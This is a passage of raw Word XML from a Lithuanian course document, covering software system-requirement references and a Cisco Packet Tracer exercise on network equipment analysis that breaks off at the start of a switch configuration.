      <w:r w:rsidR="3250E2FE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:hyperlink r:id="rId35">
        <w:r w:rsidR="3250E2FE" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:i/>
            <w:iCs/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>DaVinci Resolve</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="3250E2FE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. Prieiga per internetą:</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId36">
        <w:r w:rsidR="1A1602C6" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://motionarray.com/learn/davinci-resolve/davinci-resolve-system-requirements/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="73A80E00" w14:textId="12C7F37C" w:rsidR="008655A9" w:rsidRPr="005A5C28" w:rsidRDefault="2F46C135" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Photoshop </w:t>
      </w:r>
      <w:r w:rsidR="4FB67BDC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>System Requirements.</w:t>
      </w:r>
      <w:r w:rsidR="5056C5AE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="5056C5AE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Adobe. </w:t>
      </w:r>
      <w:r w:rsidR="33B2996F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(2021, sausio 10).</w:t>
      </w:r>
      <w:r w:rsidR="5056C5AE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="5056C5AE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId37">
        <w:r w:rsidR="5056C5AE" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.adobe.com/lt/products/photoshop-elements/tech-specs.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="408368D4" w14:textId="5401A68B" w:rsidR="78BA4574" w:rsidRPr="005A5C28" w:rsidRDefault="39A6135A" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SOLIDWORKS and SW Data Management System Requirements.</w:t>
      </w:r>
      <w:r w:rsidR="64BDC4AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="64BDC4AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Solid</w:t>
      </w:r>
      <w:r w:rsidR="1482C348" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="64BDC4AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>orks.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1482C348" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId38">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.solidworks.com/support/system-requirements</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="33561389" w14:textId="424B4DCD" w:rsidR="50B326DD" w:rsidRPr="005A5C28" w:rsidRDefault="0B4D7F52" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">System Requirements for Autodesk Maya 2020. </w:t>
      </w:r>
      <w:r w:rsidR="7663D87F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Autodesk.</w:t>
      </w:r>
      <w:r w:rsidR="70172D97" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2021, sausio 10).</w:t>
      </w:r>
      <w:r w:rsidR="7663D87F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId39" w:history="1">
        <w:r w:rsidR="00A57E70" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://knowledge.autodesk.com/support/maya/learn-explore/caas/sfdcarticles/sfdcarticles/System-requirements-for-Autodesk-Maya-2020.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A57E70" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFB9E20" w14:textId="163F0C05" w:rsidR="009E6FE6" w:rsidRPr="005A5C28" w:rsidRDefault="009E6FE6" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2291715E" w14:textId="3F56280C" w:rsidR="0001674F" w:rsidRPr="005A5C28" w:rsidRDefault="5AD418FE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Hlk60950626"/>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="70E65494" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> u</w:t>
      </w:r>
      <w:r w:rsidR="39B73FD4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>žduotis.</w:t>
      </w:r>
      <w:r w:rsidR="39B73FD4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> ATLIKTI TINKLO ĮRANGOS ANALIZĘ.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="4"/>
    <w:p w14:paraId="42D864EA" w14:textId="6D1CE3DA" w:rsidR="00BA68E2" w:rsidRPr="005A5C28" w:rsidRDefault="39B73FD4" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">UŽDUOTIES SĄLYGA: </w:t>
      </w:r>
      <w:r w:rsidR="006747E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>Jums p</w:t>
      </w:r>
      <w:r w:rsidR="00FF046F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>ateik</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>ta</w:t>
      </w:r>
      <w:r w:rsidR="452BC105" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FF046F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Cisco Packet Tracer programos </w:t>
      </w:r>
      <w:r w:rsidR="452BC105" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>tinklo</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> simuliacijos schem</w:t>
      </w:r>
      <w:r w:rsidR="6803E8DC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00FF046F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E4AA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>atikrin</w:t>
      </w:r>
      <w:r w:rsidR="002E4AA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidR="00D762EF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F26511" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>ar</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E4AA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">veikia </w:t>
      </w:r>
      <w:r w:rsidR="00F26511" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>visi tinkle esantys įrenginiai</w:t>
      </w:r>
      <w:r w:rsidR="002E4AA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>. N</w:t>
      </w:r>
      <w:r w:rsidR="00BA41C2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>ustat</w:t>
      </w:r>
      <w:r w:rsidR="002E4AA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>ykite</w:t>
      </w:r>
      <w:r w:rsidR="00D762EF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">kokia </w:t>
      </w:r>
      <w:r w:rsidR="002E4AA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>tinklo įranga</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00515CF6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">naudojama </w:t>
      </w:r>
      <w:r w:rsidR="7116E4A0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>bei</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E4AA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">nurodykite </w:t>
      </w:r>
      <w:r w:rsidR="7116E4A0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>trūksta</w:t>
      </w:r>
      <w:r w:rsidR="00125DD5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>mus</w:t>
      </w:r>
      <w:r w:rsidR="7116E4A0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> nustatym</w:t>
      </w:r>
      <w:r w:rsidR="00125DD5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>us</w:t>
      </w:r>
      <w:r w:rsidR="7116E4A0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> tinkl</w:t>
      </w:r>
      <w:r w:rsidR="00373F6D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="167A9CB8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> įrangos</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> simuliacijoje.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBBCFC3" w14:textId="600A770A" w:rsidR="06068F3E" w:rsidRPr="005A5C28" w:rsidRDefault="54A39692" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D15CD33" wp14:editId="4A8BCA29">
            <wp:extent cx="6271895" cy="2657475"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="383478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rcRect t="14722" r="40606" b="38055"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6272535" cy="2657746"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D88C86A" w14:textId="77777777" w:rsidR="06068F3E" w:rsidRPr="005A5C28" w:rsidRDefault="051BE601" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>1 pav. Cisco Packet Tracer simuliacija.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EB718A" w14:textId="54CF1DB3" w:rsidR="06068F3E" w:rsidRPr="005A5C28" w:rsidRDefault="051BE601" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Šaltinis: L. Tokranov (2021)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8B1174" w14:textId="502E627D" w:rsidR="49F8D67A" w:rsidRPr="005A5C28" w:rsidRDefault="49F8D67A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21D2410B" w14:textId="77777777" w:rsidR="00A57E70" w:rsidRPr="005A5C28" w:rsidRDefault="00A57E70" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F2510E7" w14:textId="77777777" w:rsidR="00A57E70" w:rsidRPr="005A5C28" w:rsidRDefault="00A57E70" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B91E1FD" w14:textId="4B6364F6" w:rsidR="00A66EED" w:rsidRPr="005A5C28" w:rsidRDefault="282C5711" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tinkl</w:t>
      </w:r>
      <w:r w:rsidR="009E5ED9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> įrangos konfigūravimo nustatymai</w:t>
      </w:r>
      <w:r w:rsidR="29229A93" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2197E8EE" w14:textId="28C2C45E" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="002D4E98" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="00871ECD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>omutatoriaus C</w:t>
      </w:r>
      <w:r w:rsidR="3C6A82E0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>isco 2960</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7FBE1982" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Switch0</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0051309A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ustatymai</w:t>
      </w:r>
      <w:r w:rsidR="7FBE1982" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECEB9A1" w14:textId="565C78FC" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="518C759D" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch&gt;en</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FC9710" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="7FBE1982" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
